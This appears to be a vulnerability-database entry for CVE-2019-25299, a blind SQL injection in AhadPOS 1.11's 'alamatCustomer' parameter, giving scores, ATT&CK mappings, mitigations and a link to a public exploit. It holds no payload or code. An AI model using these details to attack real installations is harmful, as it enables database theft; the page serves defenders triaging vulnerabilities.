Cyber Resilience

CVE-2019-25299

HighPublic PoC

Published: 06 February 2026

Published
06 February 2026
Modified
15 April 2026
KEV Added
Patch
CVSS Score v4 7.1 CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0004 14.1th percentile
Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2019-25299 is a high-severity SQL Injection (CWE-89) vulnerability. Its CVSS base score is 7.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 14.1th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and AC-6 (Least Privilege).

Deeper analysis

CVE-2019-25299 is a SQL injection vulnerability in RimbaLinux AhadPOS version 1.11. The issue affects the 'alamatCustomer' parameter, which fails to properly sanitize user input in POST requests, allowing attackers to manipulate database queries. Exploitation relies on time-based and boolean-based blind SQL injection techniques to extract information or interact with the underlying database. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N) and maps to CWE-89.

The attack requires low privileges (PR:L) and can be conducted remotely over the network (AV:N) with low complexity (AC:L) and no user interaction (UI:N). Attackers with authenticated access at a low level can craft malicious POST requests to the vulnerable parameter, achieving high confidentiality impact through data extraction and low integrity impact via query alteration, without affecting availability.

Advisories and resources include the Vulncheck advisory at https://www.vulncheck.com/advisories/rimbalinux-ahadpos-alamatcustomer-sql-injection, an exploit script on Exploit-DB at https://www.exploit-db.com/exploits/47585, and the project repository on GitHub at https://github.com/rimbalinux/AhadPOS. These provide further details on the vulnerability and potential remediation steps.

EU & UK References

Vulnerability details

RimbaLinux AhadPOS 1.11 contains a SQL injection vulnerability in the 'alamatCustomer' parameter that allows attackers to manipulate database queries through crafted POST requests. Attackers can exploit time-based and boolean-based blind SQL injection techniques to extract information or potentially interact with…

more

the underlying database.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1213.006 Databases Collection
Adversaries may leverage databases to mine valuable information.
Why these techniques?

SQL injection in web app parameter enables remote exploitation of public-facing application (T1190) and direct unauthorized access/exfiltration from backend database (T1213.006).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2019-25537Shared CWE-89
CVE-2019-25366Shared CWE-89
CVE-2019-25496Shared CWE-89
CVE-2026-1475Shared CWE-89
CVE-2026-26990Shared CWE-89
CVE-2026-44047Shared CWE-89
CVE-2025-12865Shared CWE-89
CVE-2024-11135Shared CWE-89
CVE-2019-25491Shared CWE-89
CVE-2024-13369Shared CWE-89

Affected Assets

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation and sanitization of all input parameters (such as alamatCustomer in POST requests) to block SQL injection payloads before they reach the database.

prevent

Limits the database privileges granted to the low-privilege authenticated accounts that can reach the vulnerable parameter, reducing the impact of successful blind SQLi data extraction or modification.

detect

Enables monitoring of database query patterns and anomalies that would reveal time-based or boolean-based blind SQL injection attempts against the alamatCustomer field.

References